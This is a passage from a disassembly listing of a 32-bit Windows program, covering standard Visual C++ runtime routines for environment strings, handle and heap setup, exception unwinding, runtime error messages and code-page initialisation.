jnz loc_40317D
loc_4030FC: ; CODE XREF: sub_4030A5+2D�j
cmp esi, ebx
jnz short loc_40310C
call ebp ; GetEnvironmentStringsW
mov esi, eax
cmp esi, ebx
jz loc_4031CE
loc_40310C: ; CODE XREF: sub_4030A5+59�j
cmp [esi], bx
mov eax, esi
jz short loc_403121
loc_403113: ; CODE XREF: sub_4030A5+73�j
; sub_4030A5+7A�j
inc eax
inc eax
cmp [eax], bx
jnz short loc_403113
inc eax
inc eax
cmp [eax], bx
jnz short loc_403113
loc_403121: ; CODE XREF: sub_4030A5+6C�j
sub eax, esi
mov edi, ds:dword_4050C8
sar eax, 1
push ebx
push ebx
inc eax
push ebx
push ebx
push eax
push esi
push ebx
push ebx
mov [esp+38h+var_4], eax
call edi ; WideCharToMultiByte
mov ebp, eax
cmp ebp, ebx
jz short loc_403172
push ebp
call sub_403CB6
cmp eax, ebx
pop ecx
mov [esp+18h+var_8], eax
jz short loc_403172
push ebx
push ebx
push ebp
push eax
push [esp+28h+var_4]
push esi
push ebx
push ebx
call edi ; WideCharToMultiByte
test eax, eax
jnz short loc_40316E
push [esp+18h+var_8]
call sub_403C87
pop ecx
mov [esp+18h+var_8], ebx
loc_40316E: ; CODE XREF: sub_4030A5+B9�j
mov ebx, [esp+18h+var_8]
loc_403172: ; CODE XREF: sub_4030A5+99�j
; sub_4030A5+A8�j
push esi
call ds:dword_4050C4 ; FreeEnvironmentStringsW
mov eax, ebx
jmp short loc_4031D0
; ---------------------------------------------------------------------------
loc_40317D: ; CODE XREF: sub_4030A5+51�j
cmp eax, 2
jnz short loc_4031CE
loc_403182: ; CODE XREF: sub_4030A5+49�j
cmp edi, ebx
jnz short loc_403192
call ds:dword_4050CC ; GetEnvironmentStringsA
mov edi, eax
cmp edi, ebx
jz short loc_4031CE
loc_403192: ; CODE XREF: sub_4030A5+DF�j
cmp [edi], bl
mov eax, edi
jz short loc_4031A2
loc_403198: ; CODE XREF: sub_4030A5+F6�j
; sub_4030A5+FB�j
inc eax
cmp [eax], bl
jnz short loc_403198
inc eax
cmp [eax], bl
jnz short loc_403198
loc_4031A2: ; CODE XREF: sub_4030A5+F1�j
sub eax, edi
inc eax
mov ebp, eax
push ebp
call sub_403CB6
mov esi, eax
pop ecx
cmp esi, ebx
jnz short loc_4031B8
xor esi, esi
jmp short loc_4031C3
; ---------------------------------------------------------------------------
loc_4031B8: ; CODE XREF: sub_4030A5+10D�j
push ebp
push edi
push esi
call sub_402290
add esp, 0Ch
loc_4031C3: ; CODE XREF: sub_4030A5+111�j
push edi
call ds:dword_4050C0 ; FreeEnvironmentStringsA
mov eax, esi
jmp short loc_4031D0
; ---------------------------------------------------------------------------
loc_4031CE: ; CODE XREF: sub_4030A5+39�j
; sub_4030A5+61�j ...
xor eax, eax
loc_4031D0: ; CODE XREF: sub_4030A5+D6�j
; sub_4030A5+127�j
pop edi
pop esi
pop ebp
pop ebx
pop ecx
pop ecx
retn
sub_4030A5 endp
; =============== S U B R O U T I N E =======================================
sub_4031D7 proc near ; CODE XREF: sub_40283E+6F�p
var_44 = byte ptr -44h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
sub esp, 44h
push ebx
push ebp
push esi
push edi
push 100h
call sub_403CB6
mov esi, eax
pop ecx
test esi, esi
jnz short loc_4031F7
push 1Bh
call sub_402934
pop ecx
loc_4031F7: ; CODE XREF: sub_4031D7+16�j
mov ds:dword_407340, esi
mov ds:dword_407440, 20h
lea eax, [esi+100h]
loc_40320D: ; CODE XREF: sub_4031D7+52�j
cmp esi, eax
jnb short loc_40322B
and byte ptr [esi+4], 0
or dword ptr [esi], 0FFFFFFFFh
mov byte ptr [esi+5], 0Ah
mov eax, ds:dword_407340
add esi, 8
add eax, 100h
jmp short loc_40320D
; ---------------------------------------------------------------------------
loc_40322B: ; CODE XREF: sub_4031D7+38�j
lea eax, [esp+54h+var_44]
push eax
call ds:dword_4050A4 ; GetStartupInfoA
cmp word ptr [esp+54h+var_14+2], 0
jz loc_403307
mov eax, [esp+54h+var_10]
test eax, eax
jz loc_403307
mov esi, [eax]
lea ebp, [eax+4]
mov eax, 800h
cmp esi, eax
lea ebx, [esi+ebp]
jl short loc_403261
mov esi, eax
loc_403261: ; CODE XREF: sub_4031D7+86�j
cmp ds:dword_407440, esi
jge short loc_4032BB
mov edi, offset dword_407344
loc_40326E: ; CODE XREF: sub_4031D7+DA�j
push 100h
call sub_403CB6
test eax, eax
pop ecx
jz short loc_4032B5
add ds:dword_407440, 20h
mov [edi], eax
lea ecx, [eax+100h]
loc_40328C: ; CODE XREF: sub_4031D7+CF�j
cmp eax, ecx
jnb short loc_4032A8
and byte ptr [eax+4], 0
or dword ptr [eax], 0FFFFFFFFh
mov byte ptr [eax+5], 0Ah
mov ecx, [edi]
add eax, 8
add ecx, 100h
jmp short loc_40328C
; ---------------------------------------------------------------------------
loc_4032A8: ; CODE XREF: sub_4031D7+B7�j
add edi, 4
cmp ds:dword_407440, esi
jl short loc_40326E
jmp short loc_4032BB
; ---------------------------------------------------------------------------
loc_4032B5: ; CODE XREF: sub_4031D7+A4�j
mov esi, ds:dword_407440
loc_4032BB: ; CODE XREF: sub_4031D7+90�j
; sub_4031D7+DC�j
xor edi, edi
test esi, esi
jle short loc_403307
loc_4032C1: ; CODE XREF: sub_4031D7+12E�j
mov eax, [ebx]
cmp eax, 0FFFFFFFFh
jz short loc_4032FE
mov cl, [ebp+0]
test cl, 1
jz short loc_4032FE
test cl, 8
jnz short loc_4032E0
push eax
call ds:dword_405094 ; GetFileType
test eax, eax
jz short loc_4032FE
loc_4032E0: ; CODE XREF: sub_4031D7+FC�j
mov eax, edi
mov ecx, edi
sar eax, 5
and ecx, 1Fh
mov eax, ds:dword_407340[eax*4]
lea eax, [eax+ecx*8]
mov ecx, [ebx]
mov [eax], ecx
mov cl, [ebp+0]
mov [eax+4], cl
loc_4032FE: ; CODE XREF: sub_4031D7+EF�j
; sub_4031D7+F7�j ...
inc edi
inc ebp
add ebx, 4
cmp edi, esi
jl short loc_4032C1
loc_403307: ; CODE XREF: sub_4031D7+65�j
; sub_4031D7+71�j ...
xor ebx, ebx
loc_403309: ; CODE XREF: sub_4031D7+195�j
mov eax, ds:dword_407340
cmp dword ptr [eax+ebx*8], 0FFFFFFFFh
lea esi, [eax+ebx*8]
jnz short loc_403364
test ebx, ebx
mov byte ptr [esi+4], 81h
jnz short loc_403324
push 0FFFFFFF6h
pop eax
jmp short loc_40332E
; ---------------------------------------------------------------------------
loc_403324: ; CODE XREF: sub_4031D7+146�j
mov eax, ebx
dec eax
neg eax
sbb eax, eax
add eax, 0FFFFFFF5h
loc_40332E: ; CODE XREF: sub_4031D7+14B�j
push eax
call ds:dword_4050D8 ; GetStdHandle
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_403353
push edi
call ds:dword_405094 ; GetFileType
test eax, eax
jz short loc_403353
and eax, 0FFh
mov [esi], edi
cmp eax, 2
jnz short loc_403359
loc_403353: ; CODE XREF: sub_4031D7+163�j
; sub_4031D7+16E�j
or byte ptr [esi+4], 40h
jmp short loc_403368
; ---------------------------------------------------------------------------
loc_403359: ; CODE XREF: sub_4031D7+17A�j
cmp eax, 3
jnz short loc_403368
or byte ptr [esi+4], 8
jmp short loc_403368
; ---------------------------------------------------------------------------
loc_403364: ; CODE XREF: sub_4031D7+13E�j
or byte ptr [esi+4], 80h
loc_403368: ; CODE XREF: sub_4031D7+180�j
; sub_4031D7+185�j ...
inc ebx
cmp ebx, 3
jl short loc_403309
push ds:dword_407440
call ds:dword_4050D4 ; SetHandleCount
pop edi
pop esi
pop ebp
pop ebx
add esp, 44h
retn
sub_4031D7 endp
; =============== S U B R O U T I N E =======================================
sub_403382 proc near ; CODE XREF: sub_40283E+5A�p
arg_0 = dword ptr 4
xor eax, eax
push 0
cmp [esp+4+arg_0], eax
push 1000h
setz al
push eax
call ds:dword_40508C ; HeapCreate
test eax, eax
mov ds:dword_407328, eax
jz short loc_4033B7
call sub_403D2A
test eax, eax
jnz short loc_4033BA
push ds:dword_407328
call ds:dword_405090 ; HeapDestroy
loc_4033B7: ; CODE XREF: sub_403382+1E�j
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_4033BA: ; CODE XREF: sub_403382+27�j
push 1
pop eax
retn
sub_403382 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4033C0 proc near ; CODE XREF: sub_4034B8+5A�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
push ebp
push 0
push 0
push offset loc_4033D8
push [ebp+arg_0]
call sub_404CA6 ; RtlUnwind
loc_4033D8: ; DATA XREF: sub_4033C0+B�o
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_4033C0 endp
; =============== S U B R O U T I N E =======================================
sub_4033E0 proc near ; DATA XREF: sub_403402+A�o
; .text:00403473�o
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_C = dword ptr 10h
mov ecx, [esp+arg_0]
test dword ptr [ecx+4], 6
mov eax, 1
jz short locret_403401
mov eax, [esp+arg_4]
mov edx, [esp+arg_C]
mov [edx], eax
mov eax, 3
locret_403401: ; CODE XREF: sub_4033E0+10�j
retn
sub_4033E0 endp
; =============== S U B R O U T I N E =======================================
sub_403402 proc near ; CODE XREF: sub_4034B8+67�p
; sub_4034B8+A7�p ...
var_14 = dword ptr -14h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov eax, [esp+0Ch+arg_0]
push eax
push 0FFFFFFFEh
push offset sub_4033E0
push large dword ptr fs:0
mov large fs:0, esp
loc_40341F: ; CODE XREF: sub_403402:loc_40345A�j
mov eax, [esp+1Ch+arg_0]
mov ebx, [eax+8]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFFh
jz short loc_40345C
cmp esi, [esp+1Ch+arg_4]
jz short loc_40345C
lea esi, [esi+esi*2]
mov ecx, [ebx+esi*4]
mov [esp+1Ch+var_14], ecx
mov [eax+0Ch], ecx
cmp dword ptr [ebx+esi*4+4], 0
jnz short loc_40345A
push 101h
mov eax, [ebx+esi*4+8]
call sub_403496
call dword ptr [ebx+esi*4+8]
loc_40345A: ; CODE XREF: sub_403402+44�j
jmp short loc_40341F
; ---------------------------------------------------------------------------
loc_40345C: ; CODE XREF: sub_403402+2A�j
; sub_403402+30�j
pop large dword ptr fs:0
add esp, 0Ch
pop edi
pop esi
pop ebx
retn
sub_403402 endp
; ---------------------------------------------------------------------------
xor eax, eax
mov ecx, large fs:0
cmp dword ptr [ecx+4], offset sub_4033E0
jnz short locret_40348C
mov edx, [ecx+0Ch]
mov edx, [edx+0Ch]
cmp [ecx+8], edx
jnz short locret_40348C
mov eax, 1
locret_40348C: ; CODE XREF: .text:0040347A�j
; .text:00403485�j
retn
; ---------------------------------------------------------------------------
push ebx
push ecx
mov ebx, offset dword_406D8C
jmp short loc_4034A0
; =============== S U B R O U T I N E =======================================
sub_403496 proc near ; CODE XREF: sub_403402+4F�p
; sub_4034B8+78�p
push ebx
push ecx
mov ebx, offset dword_406D8C
mov ecx, [ebp+8]
loc_4034A0: ; CODE XREF: .text:00403494�j
mov [ebx+8], ecx
mov [ebx+4], eax
mov [ebx+0Ch], ebp
pop ecx
pop ebx
retn 4
sub_403496 endp
; ---------------------------------------------------------------------------
align 10h
push esi
inc ebx
xor dh, [eax]
pop eax
inc ebx
xor [eax], dh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4034B8 proc near ; DATA XREF: sub_40283E+A�o
; sub_40371C+A�o ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
push ebp
cld
mov ebx, [ebp+arg_4]
mov eax, [ebp+arg_0]
test dword ptr [eax+4], 6
jnz loc_403558
mov [ebp+var_8], eax
mov eax, [ebp+arg_8]
mov [ebp+var_4], eax
lea eax, [ebp+var_8]
mov [ebx-4], eax
mov esi, [ebx+0Ch]
mov edi, [ebx+8]
loc_4034EB: ; CODE XREF: sub_4034B8+90�j
cmp esi, 0FFFFFFFFh
jz short loc_403551
lea ecx, [esi+esi*2]
cmp dword ptr [edi+ecx*4+4], 0
jz short loc_40353F
push esi
push ebp
lea ebp, [ebx+10h]
call dword ptr [edi+ecx*4+4]
pop ebp
pop esi
mov ebx, [ebp+arg_4]
or eax, eax
jz short loc_40353F
js short loc_40354A
mov edi, [ebx+8]
push ebx
call sub_4033C0
add esp, 4
lea ebp, [ebx+10h]
push esi
push ebx
call sub_403402
add esp, 8
lea ecx, [esi+esi*2]
push 1
mov eax, [edi+ecx*4+8]
call sub_403496
mov eax, [edi+ecx*4]
mov [ebx+0Ch], eax
call dword ptr [edi+ecx*4+8]
loc_40353F: ; CODE XREF: sub_4034B8+40�j
; sub_4034B8+52�j
mov edi, [ebx+8]
lea ecx, [esi+esi*2]
mov esi, [edi+ecx*4]
jmp short loc_4034EB
; ---------------------------------------------------------------------------
loc_40354A: ; CODE XREF: sub_4034B8+54�j
mov eax, 0
jmp short loc_40356D
; ---------------------------------------------------------------------------
loc_403551: ; CODE XREF: sub_4034B8+36�j
mov eax, 1
jmp short loc_40356D
; ---------------------------------------------------------------------------
loc_403558: ; CODE XREF: sub_4034B8+18�j
push ebp
lea ebp, [ebx+10h]
push 0FFFFFFFFh
push ebx
call sub_403402
add esp, 8
pop ebp
mov eax, 1
loc_40356D: ; CODE XREF: sub_4034B8+97�j
; sub_4034B8+9E�j
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_4034B8 endp
; ---------------------------------------------------------------------------
push ebp
mov ecx, [esp+8]
mov ebp, [ecx]
mov eax, [ecx+1Ch]
push eax
mov eax, [ecx+18h]
push eax
call sub_403402
add esp, 8
pop ebp
retn 4
; =============== S U B R O U T I N E =======================================
sub_403590 proc near ; CODE XREF: sub_402934+9�p
; sub_402959+9�p
mov eax, ds:dword_406F48
cmp eax, 1
jz short loc_4035A7
test eax, eax
jnz short locret_4035C8
cmp ds:dword_406AD4, 1
jnz short locret_4035C8
loc_4035A7: ; CODE XREF: sub_403590+8�j
push 0FCh
call sub_4035C9
mov eax, ds:dword_4070A4
pop ecx
test eax, eax
jz short loc_4035BD
call eax
loc_4035BD: ; CODE XREF: sub_403590+29�j
push 0FFh
call sub_4035C9
pop ecx
locret_4035C8: ; CODE XREF: sub_403590+C�j
; sub_403590+15�j
retn
sub_403590 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4035C9 proc near ; CODE XREF: sub_402934+12�p
; sub_402959+12�p ...
var_1A4 = byte ptr -1A4h
var_A0 = byte ptr -0A0h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1A4h
mov edx, [ebp+arg_0]
xor ecx, ecx
mov eax, offset dword_406DA0
loc_4035DC: ; CODE XREF: sub_4035C9+20�j
cmp edx, [eax]
jz short loc_4035EB
add eax, 8
inc ecx
cmp eax, offset byte_406E30
jl short loc_4035DC
loc_4035EB: ; CODE XREF: sub_4035C9+15�j
push esi
mov esi, ecx
shl esi, 3
cmp edx, ds:dword_406DA0[esi]
jnz loc_403719
mov eax, ds:dword_406F48
cmp eax, 1
jz loc_4036F3
test eax, eax
jnz short loc_40361C
cmp ds:dword_406AD4, 1
jz loc_4036F3
loc_40361C: ; CODE XREF: sub_4035C9+44�j
cmp edx, 0FCh
jz loc_403719
lea eax, [ebp+var_1A4]
push 104h
push eax
push 0
call ds:dword_405034 ; GetModuleFileNameA
test eax, eax
jnz short loc_403653
lea eax, [ebp+var_1A4]
push offset aProgramNameUnk ; "<program name unknown>"
push eax
call sub_402720
pop ecx
pop ecx
loc_403653: ; CODE XREF: sub_4035C9+75�j
lea eax, [ebp+var_1A4]
push edi
push eax
lea edi, [ebp+var_1A4]
call sub_402210
inc eax
pop ecx
cmp eax, 3Ch
jbe short loc_403696
lea eax, [ebp+var_1A4]
push eax
call sub_402210
mov edi, eax
lea eax, [ebp+var_1A4]
sub eax, 3Bh
push 3
add edi, eax
push offset a___ ; "..."
push edi
call sub_404600
add esp, 10h
loc_403696: ; CODE XREF: sub_4035C9+A2�j
lea eax, [ebp+var_A0]
push offset aRuntimeErrorPr ; "Runtime Error!\n\nProgram: "
push eax
call sub_402720
lea eax, [ebp+var_A0]
push edi
push eax
call sub_402730
lea eax, [ebp+var_A0]
push offset asc_4053E8 ; "\n\n"
push eax
call sub_402730
push ds:off_406DA4[esi]
lea eax, [ebp+var_A0]
push eax
call sub_402730
push 12010h
lea eax, [ebp+var_A0]
push offset aMicrosoftVisua ; "Microsoft Visual C++ Runtime Library"
push eax
call sub_404573
add esp, 2Ch
pop edi
jmp short loc_403719
; ---------------------------------------------------------------------------
loc_4036F3: ; CODE XREF: sub_4035C9+3C�j
; sub_4035C9+4D�j
lea eax, [ebp+arg_0]
lea esi, off_406DA4[esi]
push 0
push eax
push dword ptr [esi]
call sub_402210
pop ecx
push eax
push dword ptr [esi]
push 0FFFFFFF4h
call ds:dword_4050D8 ; GetStdHandle
push eax
call ds:dword_40507C ; WriteFile
loc_403719: ; CODE XREF: sub_4035C9+2E�j
; sub_4035C9+59�j ...
pop esi
leave
retn
sub_4035C9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40371C proc near ; CODE XREF: sub_402A4C+5E�p
; sub_403AE6+9A�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_405428
push offset sub_4034B8
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 18h
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov eax, ds:dword_4070A8
xor ebx, ebx
cmp eax, ebx
jnz short loc_40378B
lea eax, [ebp+var_1C]
push eax
push 1
pop esi
push esi
push offset dword_405424
push esi
call ds:dword_405070 ; GetStringTypeW
test eax, eax
jz short loc_403769
mov eax, esi
jmp short loc_403786
; ---------------------------------------------------------------------------
loc_403769: ; CODE XREF: sub_40371C+47�j
lea eax, [ebp+var_1C]
push eax
push esi
push offset dword_406F38
push esi
push ebx
call ds:dword_405074 ; GetStringTypeA
test eax, eax
jz loc_403851
push 2
pop eax
loc_403786: ; CODE XREF: sub_40371C+4B�j
mov ds:dword_4070A8, eax
loc_40378B: ; CODE XREF: sub_40371C+2F�j
cmp eax, 2
jnz short loc_4037B4
mov eax, [ebp+arg_14]
cmp eax, ebx
jnz short loc_40379C
mov eax, ds:dword_4070C4
loc_40379C: ; CODE XREF: sub_40371C+79�j
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
push eax
call ds:dword_405074 ; GetStringTypeA
jmp loc_403853
; ---------------------------------------------------------------------------
loc_4037B4: ; CODE XREF: sub_40371C+72�j
cmp eax, 1
jnz loc_403851
cmp [ebp+arg_10], ebx
jnz short loc_4037CA
mov eax, ds:dword_4070D4
mov [ebp+arg_10], eax
loc_4037CA: ; CODE XREF: sub_40371C+A4�j
push ebx
push ebx
push [ebp+arg_8]
push [ebp+arg_4]
mov eax, [ebp+arg_18]
neg eax
sbb eax, eax
and eax, 8
inc eax
push eax
push [ebp+arg_10]
call ds:dword_405078 ; MultiByteToWideChar
mov [ebp+var_20], eax
cmp eax, ebx
jz short loc_403851
mov [ebp+var_4], ebx
lea edi, [eax+eax]
mov eax, edi
add eax, 3
and al, 0FCh
call sub_4025D0
mov [ebp+var_18], esp
mov esi, esp
mov [ebp+var_24], esi
push edi
push ebx
push esi
call sub_4021B0
add esp, 0Ch
jmp short loc_403820
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor ebx, ebx
xor esi, esi
loc_403820: ; CODE XREF: sub_40371C+F7�j
or [ebp+var_4], 0FFFFFFFFh
cmp esi, ebx
jz short loc_403851
push [ebp+var_20]
push esi
push [ebp+arg_8]
push [ebp+arg_4]
push 1
push [ebp+arg_10]
call ds:dword_405078 ; MultiByteToWideChar
cmp eax, ebx
jz short loc_403851
push [ebp+arg_C]
push eax
push esi
push [ebp+arg_0]
call ds:dword_405070 ; GetStringTypeW
jmp short loc_403853
; ---------------------------------------------------------------------------
loc_403851: ; CODE XREF: sub_40371C+61�j
; sub_40371C+9B�j ...
xor eax, eax
loc_403853: ; CODE XREF: sub_40371C+93�j
; sub_40371C+133�j
lea esp, [ebp-34h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_40371C endp
; =============== S U B R O U T I N E =======================================
sub_403865 proc near ; CODE XREF: sub_402D47+2B�p
arg_0 = dword ptr 4
push 4
push 0
push [esp+8+arg_0]
call sub_403876
add esp, 0Ch
retn
sub_403865 endp
; =============== S U B R O U T I N E =======================================
sub_403876 proc near ; CODE XREF: sub_403865+8�p
arg_0 = byte ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
movzx eax, [esp+arg_0]
mov cl, [esp+arg_8]
test ds:byte_407221[eax], cl
jnz short loc_4038A3
cmp [esp+arg_4], 0
jz short loc_40389C
movzx eax, ds:word_406AEA[eax*2]
and eax, [esp+arg_4]
jmp short loc_40389E
; ---------------------------------------------------------------------------
loc_40389C: ; CODE XREF: sub_403876+16�j
xor eax, eax
loc_40389E: ; CODE XREF: sub_403876+24�j
test eax, eax
jnz short loc_4038A3
retn
; ---------------------------------------------------------------------------
loc_4038A3: ; CODE XREF: sub_403876+F�j
; sub_403876+2A�j
push 1
pop eax
retn
sub_403876 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4038A7 proc near ; CODE XREF: sub_403C6B+B�p
var_18 = dword ptr -18h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push esi
push edi
push [ebp+arg_0]
call sub_403A40 ; GetOEMCP
mov esi, eax
pop ecx
cmp esi, ds:dword_407100
mov [ebp+arg_0], esi
jz loc_403A34
xor ebx, ebx
cmp esi, ebx
jz loc_403A2A
xor edx, edx
mov eax, offset dword_406E38
loc_4038DB: ; CODE XREF: sub_4038A7+41�j
cmp [eax], esi
jz short loc_403951
add eax, 30h
inc edx
cmp eax, offset dword_406F28
jl short loc_4038DB
lea eax, [ebp+var_18]
push eax
push esi
call ds:dword_40506C ; GetCPInfo
cmp eax, 1
jnz loc_403A22
push 40h
xor eax, eax
pop ecx
mov edi, offset byte_407220
cmp [ebp+var_18], 1
mov ds:dword_407100, esi
rep stosd
stosb
mov ds:dword_407324, ebx
jbe loc_403A10
cmp [ebp+var_12], 0
jz loc_4039E6
lea ecx, [ebp+var_11]
loc_40392E: ; CODE XREF: sub_4038A7+139�j
mov dl, [ecx]
test dl, dl
jz loc_4039E6
movzx eax, byte ptr [ecx-1]
movzx edx, dl
loc_40393F: ; CODE XREF: sub_4038A7+A8�j
cmp eax, edx
ja loc_4039DA
or ds:byte_407221[eax], 4
inc eax
jmp short loc_40393F
; ---------------------------------------------------------------------------
loc_403951: ; CODE XREF: sub_4038A7+36�j
push 40h
xor eax, eax
pop ecx
mov edi, offset byte_407220
rep stosd
lea esi, [edx+edx*2]
mov [ebp+var_4], ebx
shl esi, 4
stosb
lea ebx, dword_406E48[esi]
loc_40396D: ; CODE XREF: sub_4038A7+103�j
cmp byte ptr [ebx], 0
mov ecx, ebx
jz short loc_4039A0
loc_403974: ; CODE XREF: sub_4038A7+F7�j
mov dl, [ecx+1]
test dl, dl
jz short loc_4039A0
movzx eax, byte ptr [ecx]
movzx edi, dl
cmp eax, edi
ja short loc_403999
mov edx, [ebp+var_4]
mov dl, ds:byte_406E30[edx]
loc_40398E: ; CODE XREF: sub_4038A7+F0�j
or ds:byte_407221[eax], dl
inc eax
cmp eax, edi
jbe short loc_40398E
loc_403999: ; CODE XREF: sub_4038A7+DC�j
inc ecx
inc ecx
cmp byte ptr [ecx], 0
jnz short loc_403974
loc_4039A0: ; CODE XREF: sub_4038A7+CB�j
; sub_4038A7+D2�j
inc [ebp+var_4]
add ebx, 8
cmp [ebp+var_4], 4
jb short loc_40396D
mov eax, [ebp+arg_0]
mov ds:dword_40711C, 1
push eax
mov ds:dword_407100, eax
call sub_403A8A
lea esi, dword_406E3C[esi]
mov edi, offset dword_407110
movsd
movsd
pop ecx
mov ds:dword_407324, eax
movsd
jmp short loc_403A2F
; ---------------------------------------------------------------------------
loc_4039DA: ; CODE XREF: sub_4038A7+9A�j
inc ecx
inc ecx
cmp byte ptr [ecx-1], 0
jnz loc_40392E
loc_4039E6: ; CODE XREF: sub_4038A7+7E�j
; sub_4038A7+8B�j
push 1
pop eax
loc_4039E9: ; CODE XREF: sub_4038A7+14F�j
or ds:byte_407221[eax], 8
inc eax
cmp eax, 0FFh
jb short loc_4039E9
push esi
call sub_403A8A
pop ecx
mov ds:dword_407324, eax
mov ds:dword_40711C, 1
jmp short loc_403A16
; ---------------------------------------------------------------------------
loc_403A10: ; CODE XREF: sub_4038A7+74�j
mov ds:dword_40711C, ebx
loc_403A16: ; CODE XREF: sub_4038A7+167�j
xor eax, eax
mov edi, offset dword_407110
stosd
stosd
stosd
jmp short loc_403A2F
; ---------------------------------------------------------------------------
loc_403A22: ; CODE XREF: sub_4038A7+51�j
cmp ds:dword_4070AC, ebx
jz short loc_403A38
loc_403A2A: ; CODE XREF: sub_4038A7+27�j
call sub_403ABD
loc_403A2F: ; CODE XREF: sub_4038A7+131�j
; sub_4038A7+179�j
call sub_403AE6
loc_403A34: ; CODE XREF: sub_4038A7+1D�j
xor eax, eax
jmp short loc_403A3B
; ---------------------------------------------------------------------------
loc_403A38: ; CODE XREF: sub_4038A7+181�j
or eax, 0FFFFFFFFh
loc_403A3B: ; CODE XREF: sub_4038A7+18F�j
pop edi
pop esi
pop ebx
leave
retn
sub_4038A7 endp
; =============== S U B R O U T I N E =======================================
sub_403A40 proc near ; CODE XREF: sub_4038A7+C�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
and ds:dword_4070AC, 0
cmp eax, 0FFFFFFFEh
jnz short loc_403A60
mov ds:dword_4070AC, 1
jmp ds:dword_405064
; ---------------------------------------------------------------------------
loc_403A60: ; CODE XREF: sub_403A40+E�j
cmp eax, 0FFFFFFFDh
jnz short loc_403A75
mov ds:dword_4070AC, 1
jmp ds:dword_405068
; ---------------------------------------------------------------------------
loc_403A75: ; CODE XREF: sub_403A40+23�j
cmp eax, 0FFFFFFFCh
jnz short locret_403A89
mov eax, ds:dword_4070D4
mov ds:dword_4070AC, 1
locret_403A89: ; CODE XREF: sub_403A40+38�j
retn
sub_403A40 endp
; =============== S U B R O U T I N E =======================================
sub_403A8A proc near ; CODE XREF: sub_4038A7+118�p
; sub_4038A7+152�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
sub eax, 3A4h
jz short loc_403AB7
sub eax, 4
jz short loc_403AB1
sub eax, 0Dh
jz short loc_403AAB
dec eax
jz short loc_403AA5
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_403AA5: ; CODE XREF: sub_403A8A+16�j
mov eax, 404h
retn
; ---------------------------------------------------------------------------
loc_403AAB: ; CODE XREF: sub_403A8A+13�j
mov eax, 412h
retn
; ---------------------------------------------------------------------------
loc_403AB1: ; CODE XREF: sub_403A8A+E�j
mov eax, 804h
retn
; ---------------------------------------------------------------------------
loc_403AB7: ; CODE XREF: sub_403A8A+9�j
mov eax, 411h
retn
sub_403A8A endp
; =============== S U B R O U T I N E =======================================
sub_403ABD proc near ; CODE XREF: sub_4038A7:loc_403A2A�p
push edi
push 40h
pop ecx
xor eax, eax
mov edi, offset byte_407220
rep stosd
stosb
xor eax, eax
mov edi, offset dword_407110
mov ds:dword_407100, eax
mov ds:dword_40711C, eax
mov ds:dword_407324, eax
stosd
stosd
stosd
pop edi
retn
sub_403ABD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403AE6 proc near ; CODE XREF: sub_4038A7:loc_403A2F�p
var_514 = byte ptr -514h
var_314 = byte ptr -314h
var_214 = byte ptr -214h
var_114 = byte ptr -114h
var_14 = byte ptr -14h
var_E = byte ptr -0Eh
var_D = byte ptr -0Dh
push ebp
mov ebp, esp
sub esp, 514h
lea eax, [ebp+var_14]
push esi
push eax
push ds:dword_407100
call ds:dword_40506C ; GetCPInfo
cmp eax, 1
jnz loc_403C1F
xor eax, eax
mov esi, 100h
loc_403B10: ; CODE XREF: sub_403AE6+34�j
mov [ebp+eax+var_114], al
inc eax
cmp eax, esi
jb short loc_403B10
mov al, [ebp+var_E]
mov [ebp+var_114], 20h
test al, al
jz short loc_403B61
push ebx
push edi
lea edx, [ebp+var_D]
loc_403B2F: ; CODE XREF: sub_403AE6+77�j
movzx ecx, byte ptr [edx]
movzx eax, al
cmp eax, ecx
ja short loc_403B56
sub ecx, eax
lea edi, [ebp+eax+var_114]
inc ecx
mov eax, 20202020h
mov ebx, ecx
shr ecx, 2
rep stosd
mov ecx, ebx
and ecx, 3
rep stosb
loc_403B56: ; CODE XREF: sub_403AE6+51�j
inc edx
inc edx
mov al, [edx-1]
test al, al
jnz short loc_403B2F
pop edi
pop ebx
